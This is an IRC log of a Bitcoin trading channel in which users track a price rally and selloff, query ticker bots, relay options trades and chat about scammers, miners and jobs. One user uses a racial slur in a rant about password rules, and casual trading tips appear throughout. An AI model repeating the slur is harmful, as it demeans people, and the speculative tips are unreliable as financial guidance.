BTC [-] Mar 25 17:14:18 ;;bc,24hrprc Mar 25 17:14:19 Error: "bc,24hrprc" is not a valid command. Mar 25 17:14:26 whats that cimmad Mar 25 17:14:53 ;;bc,24hprc Mar 25 17:14:54 thestringpuller: I don't KNOW about that loss.... That is my general sense from the options flow this month Mar 25 17:14:55 72.28 Mar 25 17:15:08 ;;ticker Mar 25 17:15:08 BTCUSD ticker | Best bid: 76.05001, Best ask: 76.80000, Bid-ask spread: 0.74999, Last trade: 76.03000, 24 hour volume: 64448.06308381, 24 hour low: 68.50000, 24 hour high: 75.00000, 24 hour vwap: 72.15001 Mar 25 17:15:26 well now is the time to make your bets Mar 25 17:15:51 im more happy now than at 32 Mar 25 17:15:55 Powda can I send you coin and you Push options to smickles Mar 25 17:16:11 http://i.imgur.com/Jck5tQQ.png Mar 25 17:16:33 sure Mar 25 17:16:39 pm me the amount Mar 25 17:17:12 im interested in next month 100 calls, what is the price Mar 25 17:17:21 and bugpowder you are a broker? Mar 25 17:17:27 no Mar 25 17:17:51 just a favor Mar 25 17:18:06 smickles is the broker Mar 25 17:18:13 or jurov via coinbr Mar 25 17:18:47 okay Mar 25 17:18:51 not a problem Mar 25 17:18:55 I feel sorta bad for ATC Mar 25 17:19:02 ATC? Mar 25 17:19:15 i lent him 3 coins at 59 per btc Mar 25 17:19:18 the forum dude Mar 25 17:19:21 ATC777 Mar 25 17:19:28 oh you mean the guy who scammed you? Mar 25 17:19:32 lol Mar 25 17:19:34 77.7 Mar 25 17:19:40 jackpot Mar 25 17:19:40 lol Mar 25 17:19:44 ATC isnt a scammer Mar 25 17:19:44 lol Mar 25 17:19:52 ok Mar 25 17:20:12 so.. how is ianbakewell gonna react to this Mar 25 17:20:14 [MPEX] [O.BTCUSD.C750T] 4 @ 0.0595729 = 0.2383 BTC [-] Mar 25 17:20:20 poorly Mar 25 17:20:22 77 BTC.. he shorted it at 34.5 Mar 25 17:21:26 isnt he a gonner? Mar 25 17:21:36 he still posts in forums Mar 25 17:21:39 i believe Mar 25 17:21:48 i re read his thread.. ianbakewell.. his first payment is due on the 29th Mar 25 17:22:03 he hasnt been online since the 4th Mar 25 17:24:09 CHM! Mar 25 17:24:26 he be a scammer Mar 25 17:24:35 chm? Mar 25 17:24:45 ?? Mar 25 17:24:51 not CHM, he is a good guy,. ianbakewellis a clear scammer Mar 25 17:25:06 i proposed a bet that hes gonna scam Mar 25 17:25:07 idk Mar 25 17:25:09 CHM the 5th order of yours today Mar 25 17:25:11 well that's good. Hate to think I was sleep posting or something. Mar 25 17:25:14 kako ignored my bet Mar 25 17:25:15 got* Mar 25 17:25:35 right on. tracking hasn't been updated. did you have to pay anything? Mar 25 17:25:35 thank you very much good sir cmh! Mar 25 17:25:40 chm Mar 25 17:25:45 yes Mar 25 17:25:48 30% taxes Mar 25 17:26:10 yeah. happens. prolly lowballed on the invoice though so maybe not too bad? Mar 25 17:26:12 btc 77.7 Mar 25 17:26:21 its okay Mar 25 17:26:27 2000 baht or like 66$ Mar 25 17:26:32 so 305 of that Mar 25 17:26:34 http://i.imgur.com/QtbTbnL.jpg Mar 25 17:26:39 oh, no worries then. Mar 25 17:26:46 better than Canada that's for sure. Mar 25 17:26:48 and really i dont pay taxes other than on goods like this so i dont give a fuck Mar 25 17:26:55 2 months ago people ridiculed me for preferring the coin on the right Mar 25 17:27:01 [MPEX] [O.BTCUSD.C750T] 4 @ 0.06040495 = 0.2416 BTC [+] Mar 25 17:27:19 i think the hk people did the 200 baht valuation, if it was a thai i would have got 0 Mar 25 17:27:29 not that it matters, i dont care Mar 25 17:27:35 thanks for the awesome order Mar 25 17:27:51 always a pleasure. let me know when you want to do that other thing. Mar 25 17:28:29 i can see some rust Mar 25 17:28:33 on that coin Mar 25 17:28:37 its plated, right Mar 25 17:29:19 [MPEX] [O.BTCUSD.C750T] 4 @ 0.06040495 = 0.2416 BTC [+] Mar 25 17:30:16 [MPEX] [O.BTCUSD.C750T] 5 @ 0.06040495 = 0.302 BTC [+] Mar 25 17:30:26 i like how im just chilling here, not going ballistic over the price anymore Mar 25 17:30:36 does that mean im not a newbie? Mar 25 17:30:48 i graduated from that shit. im hardened a bit nowadays Mar 25 17:33:07 [MPEX] [O.BTCUSD.C730T] 3 @ 0.07431064 = 0.2229 BTC [+] Mar 25 17:33:09 [MPEX] [O.BTCUSD.C750T] 3 @ 0.06040495 = 0.1812 BTC [+] Mar 25 17:34:23 whats the difference between C750T & C750N?? Mar 25 17:34:23 ;;goxlag Mar 25 17:34:24 0 seconds Mar 25 17:34:25 dude I'm not a n00b and I am going ballistinc Mar 25 17:34:29 N is NEXT month Mar 25 17:34:32 T is THIS month Mar 25 17:35:10 4.5K to go for $80 Mar 25 17:35:14 how much money are u making on this Mar 25 17:35:21 going down it seems we've reached the peak eh Mar 25 17:35:23 i might make a coin.br account Mar 25 17:35:27 ;;ticker Mar 25 17:35:28 BTCUSD ticker | Best bid: 77.28001, Best ask: 77.55643, Bid-ask spread: 0.27642, Last trade: 77.55643, 24 hour volume: 67673.58734707, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 72.92790 Mar 25 17:35:32 KRS-1 its monday Mar 25 17:35:37 Top will be Thursday Mar 25 17:35:46 our new high is 78 Mar 25 17:37:05 Bowjob: I have no idea. We don't know where it willgo Mar 25 17:37:28 hopefully a lot Mar 25 17:37:35 77.93 Mar 25 17:37:47 jesus Mar 25 17:37:54 78???? Mar 25 17:37:56 i'll read about coin.br later, not in a rush Mar 25 17:38:04 people keep putting up asks and they get swallowed in a minute Mar 25 17:38:14 it must be loaded's client Mar 25 17:38:21 so im not surprised Mar 25 17:38:39 bowjob no Mar 25 17:38:55 Bowjob: you need to act decisively when the market moves. BUT you also need to be sure about your strategy. There will be many more opportunities both up and down, so do more research first. Mar 25 17:39:04 of course Mar 25 17:39:17 not in a rush. I just *yawn Mar 25 17:39:25 bitcoinality says 78 coinlab says 79.99 Mar 25 17:39:29 buy and hold served me exceedingly well Mar 25 17:39:34 survived the flahs crashes Mar 25 17:39:35 lol Mar 25 17:39:51 [MPEX] [O.BTCUSD.C730T] 3 @ 0.07508561 = 0.2253 BTC [+] Mar 25 17:39:52 [MPEX] [O.BTCUSD.C750T] 3 @ 0.06107536 = 0.1832 BTC [+] Mar 25 17:40:15 buy and hold unless you are an expert who thinks he can beat otyher experts in a crazy bull market Mar 25 17:40:38 nah, im a novice bull Mar 25 17:40:47 actually im more like an owl Mar 25 17:40:52 i just sit there.. watching Mar 25 17:40:57 I have been buying calls at the bottom of the 24vwap following each flash crash Mar 25 17:41:11 has been a good strat this month Mar 25 17:41:11 still 73 on stamp Mar 25 17:41:18 then i might become a hawk Mar 25 17:41:26 ;;calc 75/(1-1.061) Mar 25 17:41:27 -1229.50819672 Mar 25 17:41:32 ;;calc 75/(1-.061) Mar 25 17:41:32 79.8722044728 Mar 25 17:41:40 of course, the day that the crash does not bounce is the day the strat makes you lose big Mar 25 17:42:03 the idea of puts scare the crap out of me Mar 25 17:42:27 bugpowder is a btc millionair! i hope we all will be as lucky soopn Mar 25 17:43:17 we actually are all btc millionaires at some point in the future Mar 25 17:43:50 I am not a BTC millionaire Mar 25 17:44:03 I wish I was Mar 25 17:44:06 you will be though Mar 25 17:44:10 I doubt it Mar 25 17:44:17 It is possible Mar 25 17:44:19 boy did i come to the computer at a fun time Mar 25 17:44:22 but unlikely Mar 25 17:44:42 eh.. how high can btc be Mar 25 17:44:43 smickles, I need your mpex key to push you thestringpuller's options purchase Mar 25 17:44:55 Bowjob: I will probably sell all the way up Mar 25 17:45:10 mmhm Mar 25 17:45:23 pm'd Mar 25 17:45:25 very grateful that I was so lucky my initial timing of purchase Mar 25 17:45:26 Bugpowder: that has always seemed like the best strategry, %5 or so at each top Mar 25 17:45:28 there wont be a need to sell it to usd Mar 25 17:45:29 ($2.65!) Mar 25 17:45:51 deadweasel: yeah, I view it in terms of what am I comfortable holding in my total portfolio Mar 25 17:46:00 clear your investment and some profits, keep in lots of BTC Mar 25 17:46:12 iv this where i club in ral live id give all of you one of my fine cigars from coldhardmetal Mar 25 17:46:20 so you can't lose at that point, if BTC goes to $10,000, you won't be too sad. Mar 25 17:46:28 [MPEX] [O.BTCUSD.C750T] 2 @ 0.06228867 = 0.1246 BTC [+] Mar 25 17:46:32 if it goes to $.02 and stays, you won't be too sad Mar 25 17:46:45 erik is gonna be a billionaire Mar 25 17:46:46 heh Mar 25 17:46:55 more power to him Mar 25 17:47:04 no shit god bless satoshi Mar 25 17:47:14 you mean satoshi bless god Mar 25 17:47:16 I have sold 35% Mar 25 17:47:21 lol Bowjob Mar 25 17:47:25 at $40-70 Mar 25 17:47:30 i sold 5% to buy a truck Mar 25 17:47:40 i sold 2.5% to buy other goods Mar 25 17:47:47 i spent like 10 btc on steam games Mar 25 17:47:48 < deadweasel> so you can't lose at that point, if BTC goes to $10,000, you won't be too sad. << we've got to be near the top Mar 25 17:47:50 Bugpowder, me too. Paid off debts, got some nice things, still have some btc! Mar 25 17:47:53 win win win Mar 25 17:48:08 I hate you guys. Mar 25 17:48:08 smickles: what top? Mar 25 17:48:17 tom whats the matter Mar 25 17:48:22 deadweasel: the top of this rally Mar 25 17:48:24 well, i held to my btcs. Mar 25 17:48:28 so its win win win win Mar 25 17:48:36 damn skippy! Mar 25 17:48:38 :) Mar 25 17:48:43 ;;ticker Mar 25 17:48:43 BTCUSD ticker | Best bid: 77.39001, Best ask: 77.84999, Bid-ask spread: 0.45998, Last trade: 77.39001, 24 hour volume: 67656.49824912, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 72.99384 Mar 25 17:48:53 I'm indecisive as hell. And I'm sick of listening to my GF bitch that I didn't buy in a $2 when she told me to. Mar 25 17:48:54 jeez, did ianblackwell ever sort out his short? Mar 25 17:48:54 who got an avalon 3 pre order today Mar 25 17:49:02 i have so many steam games, i never use them lol Mar 25 17:49:08 chang, u got any Mar 25 17:49:10 mhm Mar 25 17:49:18 im opnly asic miner on asics Mar 25 17:49:20 i used to trade tf2 items Mar 25 17:49:23 75BTC for the preorders? Mar 25 17:49:26 fucking insane. Mar 25 17:49:26 yeah Mar 25 17:49:33 people flocked them Mar 25 17:49:36 idk what happened now Mar 25 17:49:56 Luke-Jr Mar 25 17:50:04 seems that its out of stock Mar 25 17:50:08 if you were in kc id buy you suck a good bbq dinner Mar 25 17:50:16 http://store.avalon-asics.com/?product=avalon-asic-unit Mar 25 17:51:56 Chaang-Noi: does such a thing exist? Mar 25 17:52:14 ????????????? Mar 25 17:52:19 "good bbq" :p\ Mar 25 17:52:27 if ou dont like bbq why go to kc? Mar 25 17:52:32 BFL Mar 25 17:52:32 i made a deal with my friend, id sell him a BTC for $38 as long as he watches this anime Mar 25 17:52:37 im regretting this shit now Mar 25 17:52:42 [MPEX] [O.BTCUSD.C750T] 2 @ 0.06235953 = 0.1247 BTC [+] Mar 25 17:52:43 lol Mar 25 17:52:51 id take you to golden koral best beef evar Mar 25 17:53:31 lol Mar 25 17:53:37 there's Golden Corals everywhere Mar 25 17:53:59 [HAVELOCK] [VTX] 16 @ 0.739 = 11.824 BTC [-] Mar 25 17:54:00 [HAVELOCK] [VTX] 3 @ 0.74485 = 2.2346 BTC [+] Mar 25 17:54:02 [HAVELOCK] [VTX] 5 @ 0.74489999 = 3.7245 BTC [+] Mar 25 17:54:03 [HAVELOCK] [VTX] 1 @ 0.755 BTC [+] Mar 25 17:54:03 [HAVELOCK] [VTX] 4 @ 0.78499 = 3.14 BTC [+] Mar 25 17:54:04 [HAVELOCK] [VTX] 3 @ 0.785 = 2.355 BTC [+] Mar 25 17:54:05 [HAVELOCK] [VTX] 10 @ 0.7854321 = 7.8543 BTC [+] Mar 25 17:54:06 [HAVELOCK] [VTX] 10 @ 0.789 = 7.89 BTC [+] Mar 25 17:54:07 [HAVELOCK] [VTX] 26 @ 0.7891 = 20.5166 BTC [+] Mar 25 17:54:08 [HAVELOCK] [VTX] 5 @ 0.7894 = 3.947 BTC [+] Mar 25 17:54:08 buy!!! Mar 25 17:54:09 [HAVELOCK] [VTX] 20 @ 0.78998 = 15.7996 BTC [+] Mar 25 17:54:10 [HAVELOCK] [VTX] 15 @ 0.78999 = 11.8499 BTC [+] Mar 25 17:54:11 [HAVELOCK] [VTX] 5 @ 0.78999999 = 3.95 BTC [+] Mar 25 17:54:12 [HAVELOCK] [VTX] 5 @ 0.79 = 3.95 BTC [+] Mar 25 17:54:12 [HAVELOCK] [VTX] 20 @ 0.791 = 15.82 BTC [+] Mar 25 17:54:13 lol Mar 25 17:54:13 [HAVELOCK] [VTX] 8 @ 0.798 = 6.384 BTC [+] Mar 25 17:54:16 wow Mar 25 17:54:35 coulda flipped some VTX by now Mar 25 17:54:37 Luke Jr i mean Golden Ox Mar 25 17:54:37 tsk Mar 25 17:54:43 ive been flipping em Mar 25 17:54:52 still have 28 vtx Mar 25 17:54:54 :) Mar 25 17:54:57 remind me next time I read a prospectus Mar 25 17:55:00 and decide they werent.. Mar 25 17:55:05 Luke-Jr i mean Golden Ox Mar 25 17:55:09 if the demand is high, it doesnt mean shit Mar 25 17:55:18 buy buy buy Mar 25 17:55:18 lol Mar 25 17:55:59 [HAVELOCK] [VTX] 9 @ 0.798 = 7.182 BTC [+] Mar 25 17:57:00 ;;asks 80 Mar 25 17:57:03 There are currently 4442.5939 bitcoins offered at or under 80.0 USD, worth 352404.14014 USD in total. | Data vintage: 0.0017 seconds Mar 25 17:57:20 its just a matter of time Mar 25 17:57:52 ;;asks 79.9 Mar 25 17:57:52 There are currently 2636.7019 bitcoins offered at or under 79.9 USD, worth 207956.462558 USD in total. | Data vintage: 49.5111 seconds Mar 25 17:58:12 sill walls Mar 25 17:58:14 silly Mar 25 17:58:51 [MPEX] [O.BTCUSD.C750T] 2 @ 0.06235953 = 0.1247 BTC [+] Mar 25 17:59:22 someone sold an avalon for local pickup today Mar 25 17:59:24 20k Mar 25 17:59:31 ;;asks 80.01 Mar 25 17:59:34 There are currently 4723.6273 bitcoins offered at or under 80.01 USD, worth 374591.701778 USD in total. | Data vintage: 0.0019 seconds Mar 25 17:59:39 ;;asks 80.00001 Mar 25 17:59:40 There are currently 4470.0773 bitcoins offered at or under 80.00001 USD, worth 354305.197778 USD in total. | Data vintage: 5.9075 seconds Mar 25 18:00:33 wall is at 79.95 Mar 25 18:00:36 1186btc Mar 25 18:00:44 yawn,, Mar 25 18:00:51 then 893@80 Mar 25 18:00:52 i should get a fiat paying job Mar 25 18:01:03 like 10.25 is the min wage here, that sucks tho Mar 25 18:01:40 if you hold btc 10 fiat seems like shit Mar 25 18:01:45 if not 10 is good Mar 25 18:01:59 [HAVELOCK] [VTX] 3 @ 0.799 = 2.397 BTC [+] Mar 25 18:02:03 ;;tickee Mar 25 18:02:03 Error: "tickee" is not a valid command. Mar 25 18:02:06 ;;ticker Mar 25 18:02:06 BTCUSD ticker | Best bid: 77.31000, Best ask: 77.49999, Bid-ask spread: 0.18999, Last trade: 77.31000, 24 hour volume: 67785.81682594, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.04756 Mar 25 18:02:15 whoaaaa Mar 25 18:02:55 well Mar 25 18:03:05 i thought 10.25 was shit in the first place. Mar 25 18:03:12 even before i bought btc Mar 25 18:03:42 i live in vancouver remember. $100 meals arent uncommon here Mar 25 18:04:06 that's crazy because i just ate for free for three days Mar 25 18:04:16 i have a full time job and so does my wife Mar 25 18:04:27 and i do this bitcoiin thing Mar 25 18:04:31 Bowjob do you trade BTC all day or are you a dev? Mar 25 18:04:52 i just hold btc, waiting for an asic so i can be a miner Mar 25 18:04:54 ;;asks 80 Mar 25 18:04:54 There are currently 4358.0447 bitcoins offered at or under 80.0 USD, worth 345629.399311 USD in total. | Data vintage: 55.4468 seconds Mar 25 18:05:00 Ah Mar 25 18:05:00 i have plenty of fiat still Mar 25 18:05:11 [MPEX] [O.BTCUSD.C750T] 2 @ 0.06323144 = 0.1265 BTC [+] Mar 25 18:05:20 im gonna be looking for a job soon, not for money tho Mar 25 18:05:26 to keep me from getting bored Mar 25 18:05:27 hehehe Mar 25 18:05:35 LOL Mar 25 18:05:52 ;;calc 0.24 Mar 25 18:05:52 0.24 Mar 25 18:06:07 i wanna work at a nursery, but they are still not hiring Mar 25 18:06:09 ;;calc 0.25 / 5 Mar 25 18:06:19 0.05 Mar 25 18:06:20 ;;calc 0.24 / 5 Mar 25 18:06:20 0.048 Mar 25 18:06:30 a few more years and i can retire Mar 25 18:06:34 2 mortgages left Mar 25 18:06:36 ;;calc 0.24 / 4 Mar 25 18:06:36 0.06 Mar 25 18:06:38 then i'm set Mar 25 18:07:04 well.. if btc really gets mainstream Mar 25 18:07:08 i can retire at 21 Mar 25 18:07:27 ill be bored as hell though, i've been thinking of opening a food cart. Mar 25 18:07:34 i love downtown vancouver, the food is delicious Mar 25 18:08:09 ;;asks 80 Mar 25 18:08:12 There are currently 4346.8642 bitcoins offered at or under 80.0 USD, worth 344766.935198 USD in total. | Data vintage: 0.0020 seconds Mar 25 18:08:14 you get burberry, hermes and louis vuitton in one area Mar 25 18:08:21 crazy expensive shit Mar 25 18:08:37 ;;ticker Mar 25 18:08:38 BTCUSD ticker | Best bid: 77.41001, Best ask: 77.60000, Bid-ask spread: 0.18999, Last trade: 77.60000, 24 hour volume: 67940.36996472, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.05935 Mar 25 18:08:56 burberry and hermes sound like bad things that happen to you anus Mar 25 18:09:09 80 Mar 25 18:09:15 *all time high* Mar 25 18:09:15 !ticker Mar 25 18:09:16 Have you got any tobacco? Mar 25 18:09:20 ;;ticker Mar 25 18:09:20 BTCUSD ticker | Best bid: 77.31002, Best ask: 77.41000, Bid-ask spread: 0.09998, Last trade: 77.41000, 24 hour volume: 67943.37808993, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.06120 Mar 25 18:09:24 so suppose i work for 10.25 an hour Mar 25 18:09:25 via bitcoinity.org Mar 25 18:09:31 that is 0.13 BTC per hour Mar 25 18:09:31 it needs to go to 1000 Mar 25 18:09:34 so I can start dmc 2.0 :< Mar 25 18:09:48 my asic would make more than me in a day LOL Mar 25 18:10:28 ;;bids 75 Mar 25 18:10:31 There are currently 2331.6221 bitcoins demanded at or over 75.0 USD, worth 176991.637839 USD in total. | Data vintage: 0.0065 seconds Mar 25 18:10:41 ;;bids 70 Mar 25 18:10:41 There are currently 7397.5795 bitcoins demanded at or over 70.0 USD, worth 539621.235992 USD in total. | Data vintage: 10.8616 seconds Mar 25 18:11:33 [MPEX] [O.BTCUSD.C750T] 2 @ 0.06342697 = 0.1269 BTC [+] Mar 25 18:13:57 wow Mar 25 18:14:03 oh, lol, that was on bitfloor Mar 25 18:15:40 Bowjob: baby nursery or tree nursery? Food cart would be cool. You could have a bitcoin IPO, all the cool kids are doin' it. Mar 25 18:15:59 [BTCTC] [B.YABMC] 1 @ 0.01965 BTC [+] Mar 25 18:16:16 tree nursery Mar 25 18:16:19 fuck babies Mar 25 18:16:24 all they do is take a shit Mar 25 18:16:29 .lol Mar 25 18:16:44 [BTCTC] [BASIC-MINING] 3 @ 0.344 = 1.032 BTC [+] Mar 25 18:16:47 i used to work at tree nursery, chill jo Mar 25 18:16:47 they bitch whey you don't feed them too Mar 25 18:16:47 b Mar 25 18:18:12 Don't worry, when they grow up one of them willl be changing your diaper. Mar 25 18:18:37 It's the circle of life, man... Mar 25 18:18:46 circle of shit Mar 25 18:18:53 [MPEX] [O.BTCUSD.C730T] 1 @ 0.07780924 BTC [+] Mar 25 18:18:54 [MPEX] [O.BTCUSD.C750T] 1 @ 0.06342697 BTC [+] Mar 25 18:19:31 Which is eventually dust in the wind. Kansas had it right. Mar 25 18:20:53 "Biiiitts in the wiiinddd... all we are is bits in the wind..." Oh all right, I'll shuttie. Mar 25 18:22:30 [BTCTC] [SYNERGY] 2 @ 0.0099 = 0.0198 BTC [+] Mar 25 18:22:56 [BTCTC] [BTC-BOND] 1 @ 0.009899 BTC [+] Mar 25 18:22:58 VTX looks like a rocket today at .799 but it's so low-volume if you try to sell 20 you'll only get 0.65 each. Mar 25 18:23:33 That's only up 0.02 from avg .63 for sell 20 last night. Mar 25 18:23:59 sell 1 million usd is 71 Mar 25 18:24:13 post small ask walls Mar 25 18:24:19 on vtx instead Mar 25 18:24:23 I want some but it'll crash if one person sells out in a big way. Mar 25 18:24:31 fuck no, im waitinf for $275 Mar 25 18:24:32 buyers trickle thru the day Mar 25 18:25:06 ill sell 2.5% then, i dont need fiat for years Mar 25 18:25:41 [MPEX] [O.BTCUSD.C750T] 1 @ 0.06397253 BTC [+] Mar 25 18:26:03 btw does assbot do the sell math on havelock? Mar 25 18:26:49 ;;ticker Mar 25 18:26:49 BTCUSD ticker | Best bid: 77.30000, Best ask: 77.30001, Bid-ask spread: 0.00001, Last trade: 77.30000, 24 hour volume: 68474.97889488, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.20713 Mar 25 18:27:10 !help Mar 25 18:27:11 List of commands: Mar 25 18:27:12 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} Mar 25 18:27:15 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} Mar 25 18:27:15 !mp (desc: returns the response from MPEX order) Mar 25 18:27:15 !rules (desc: chan guidelines) {short: !r} Mar 25 18:27:16 !exchanges (desc: lists exchanges and brokers) {short: !e} Mar 25 18:27:58 !exchanges Mar 25 18:28:15 !exchanges Mar 25 18:28:19 ;;asks 78 Mar 25 18:28:19 There are currently 159.12113 bitcoins offered at or under 78.0 USD, worth 12377.2388344 USD in total. | Data vintage: 40.0909 seconds Mar 25 18:28:24 ;;asks 80 Mar 25 18:28:25 There are currently 4092.5737 bitcoins offered at or under 80.0 USD, worth 325569.234681 USD in total. | Data vintage: 45.9052 seconds Mar 25 18:28:33 ughh Mar 25 18:28:35 ;;aks 100 Mar 25 18:28:35 Error: "aks" is not a valid command. Mar 25 18:28:37 i can only find retail jobs Mar 25 18:28:44 i hate uniforms Mar 25 18:28:51 ;;asks 100 Mar 25 18:28:51 There are currently 25390.783 bitcoins offered at or under 100.0 USD, worth 2333443.08551 USD in total. | Data vintage: 72.5864 seconds Mar 25 18:29:28 should be 79.50 soon... Mar 25 18:29:51 [MPEX] [S.MPOE] 4300 @ 0.00063739 = 2.7408 BTC [-] Mar 25 18:29:53 we have ath and killed the walls, im happy as fuck Mar 25 18:29:53 [MPEX] [S.MPOE] 3504 @ 0.00063656 = 2.2305 BTC [-] Mar 25 18:29:54 [MPEX] [S.MPOE] 3924 @ 0.00063583 = 2.495 BTC [-] Mar 25 18:30:00 [MPEX] [S.MPOE] 10000 @ 0.00063141 = 6.3141 BTC [-] Mar 25 18:31:59 [MPEX] [O.BTCUSD.C750T] 1 @ 0.06397144 BTC [-] Mar 25 18:32:57 ;;asks 78 Mar 25 18:33:00 There are currently 104.9359 bitcoins offered at or under 78.0 USD, worth 8173.67745538 USD in total. | Data vintage: 0.0013 seconds Mar 25 18:33:05 104! Mar 25 18:33:18 and its a monday? Mar 25 18:33:35 [BTCTC] [BASIC-MINING] 1 @ 0.344 BTC [+] Mar 25 18:34:08 chaaaaaaaaaaaaaaaang Mar 25 18:34:10 u scared me Mar 25 18:34:14 i thought 104 dollars Mar 25 18:34:14 now Mar 25 18:34:15 lol Mar 25 18:34:37 KHAAAAAAAAAAAAAAAAAAAAAAAAAAAN! Mar 25 18:35:10 www.youtube.com/watch?v=wRnSnfiUI54 Mar 25 18:37:35 selloff Mar 25 18:37:42 76 Mar 25 18:37:45 ;;ticker Mar 25 18:37:46 BTCUSD ticker | Best bid: 76.05001, Best ask: 76.50000, Bid-ask spread: 0.44999, Last trade: 76.50000, 24 hour volume: 69393.78917534, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.30885 Mar 25 18:38:04 [HAVELOCK] [VTX] 2 @ 0.797 = 1.594 BTC [-] Mar 25 18:38:05 [HAVELOCK] [VTX] 1 @ 0.797 BTC [-] Mar 25 18:38:05 [MPEX] [O.BTCUSD.C750T] 1 @ 0.06397144 BTC [-] Mar 25 18:40:19 ;;ticker Mar 25 18:40:20 BTCUSD ticker | Best bid: 75.75000, Best ask: 75.80187, Bid-ask spread: 0.05187, Last trade: 75.75000, 24 hour volume: 69551.19685202, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.31525 Mar 25 18:40:23 wow Mar 25 18:41:27 ;;ticker Mar 25 18:41:28 BTCUSD ticker | Best bid: 75.67405, Best ask: 75.70000, Bid-ask spread: 0.02595, Last trade: 75.70000, 24 hour volume: 69551.19685202, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.31525 Mar 25 18:42:07 ;;goxlag Mar 25 18:42:08 42.9828 seconds Mar 25 18:44:02 ;;ticker Mar 25 18:44:03 BTCUSD ticker | Best bid: 74.76875, Best ask: 75.00000, Bid-ask spread: 0.23125, Last trade: 74.76875, 24 hour volume: 69551.19685202, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.31525 Mar 25 18:44:06 sell off Mar 25 18:45:09 12:43pm gox suggested bid = 76, lets see how long it freezes there, Mar 25 18:45:49 ;;ticker Mar 25 18:45:50 BTCUSD ticker | Best bid: 74.20000, Best ask: 75.00000, Bid-ask spread: 0.80000, Last trade: 74.20000, 24 hour volume: 69551.19685202, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.31525 Mar 25 18:45:54 ;;goxlag Mar 25 18:45:55 164.172555 seconds Mar 25 18:45:57 oh Mar 25 18:45:59 [BTCTC] [SYNERGY] 6 @ 0.0099 = 0.0594 BTC [+] Mar 25 18:46:08 75:/ Mar 25 18:46:17 ;;ticker Mar 25 18:46:17 BTCUSD ticker | Best bid: 74.20000, Best ask: 75.00000, Bid-ask spread: 0.80000, Last trade: 74.20000, 24 hour volume: 69551.19685202, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.31525 Mar 25 18:46:21 fuck Mar 25 18:46:30 74 is better than 30 Mar 25 18:47:24 i just lost $600 Mar 25 18:47:28 on paper profit Mar 25 18:47:57 if you dont like the price, wait 10 minutes Mar 25 18:48:04 :) Mar 25 18:48:32 gos suggested price and last price still frozen after 5min Mar 25 18:48:36 gox* Mar 25 18:48:52 could this be a bull trap? Mar 25 18:49:01 its a goxtrap Mar 25 18:49:10 ^lol Mar 25 18:49:41 ;;goxlag Mar 25 18:49:43 202.260145 seconds Mar 25 18:49:53 :D Mar 25 18:50:08 ;;ticker Mar 25 18:50:10 BTCUSD ticker | Best bid: 74.40240, Best ask: 74.76845, Bid-ask spread: 0.36605, Last trade: 74.76845, 24 hour volume: 69551.19685202, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.31525 Mar 25 18:50:12 still Mar 25 18:50:12 lol Mar 25 18:50:17 cmon this has got to be price manipulation by gox Mar 25 18:50:26 http://coinlab.com/ Mar 25 18:50:27 try here Mar 25 18:50:33 i see it at 74.90 Mar 25 18:50:48 thestringpuller: are you still here Mar 25 18:50:53 still 76 suggested price at gox Mar 25 18:51:21 ;;ticker Mar 25 18:51:21 BTCUSD ticker | Best bid: 74.36000, Best ask: 74.90000, Bid-ask spread: 0.54000, Last trade: 74.90000, 24 hour volume: 69551.19685202, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.31525 Mar 25 18:51:31 coinlab works Mar 25 18:51:35 the price is 74.90 Mar 25 18:51:37 75 Mar 25 18:51:45 the 76 suggested price came in an instant while trading was brisk at 77 Mar 25 18:51:53 then froze there Mar 25 18:52:16 Starcraft 2 tournament tonight, with a BTC prize pool :D Come join us and have some fun http://www.reddit.com/r/Bitcoin/comments/1az4y1/starcraft_hots_sitngo_tournaments_for_bitcoin/ Mar 25 18:52:16 come on bulls, beat the bears Mar 25 18:52:42 ;;asks 75 Mar 25 18:52:45 There are currently 0 bitcoins offered at or under 75.0 USD, worth 0.0 USD in total. | Data vintage: 0.0016 seconds Mar 25 18:52:52 ;;asks 76 Mar 25 18:52:52 There are currently 1020.0341 bitcoins offered at or under 76.0 USD, worth 77319.2920647 USD in total. | Data vintage: 7.9433 seconds Mar 25 18:53:19 10min now at 76 suggested bid Mar 25 18:53:42 k it unfroze Mar 25 18:53:47 lets see if price pops Mar 25 18:53:51 up Mar 25 18:55:20 froze again, along with coinlab Mar 25 18:55:36 "A more complex password is required. This can be done in several ways, such as joining the words of a phrase together or combining the first letters of each word. Mar 25 18:55:42 fuck u apple and ur password shit Mar 25 18:55:51 bitch ass nigga... i cant make an easy password Mar 25 18:55:56 stupid tim cook Mar 25 18:55:57 and clicking your heels 3 times Mar 25 18:57:07 ;;ticker Mar 25 18:57:08 BTCUSD ticker | Best bid: 75.80000, Best ask: 75.80187, Bid-ask spread: 0.00187, Last trade: 75.80187, 24 hour volume: 71695.91851673, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.39370 Mar 25 18:57:12 back to normal Mar 25 18:57:57 stuck at 76 again Mar 25 18:58:16 bleh i'm done gawking Mar 25 18:58:17 coinlab works for me Mar 25 18:58:29 i mean gox suggested price Mar 25 18:58:35 it freezes Mar 25 18:58:45 seems to be leading price Mar 25 18:58:48 u know what Mar 25 18:58:49 rather than following it Mar 25 18:58:50 fuck working Mar 25 18:58:51 lol Mar 25 18:59:57 thats pretty much where i'm at Mar 25 19:00:10 i just looked at the clock saying i better get some work done today Mar 25 19:00:15 and was like wtf its 1-m Mar 25 19:00:16 1pm Mar 25 19:01:43 Oh jeeze. Compare this to 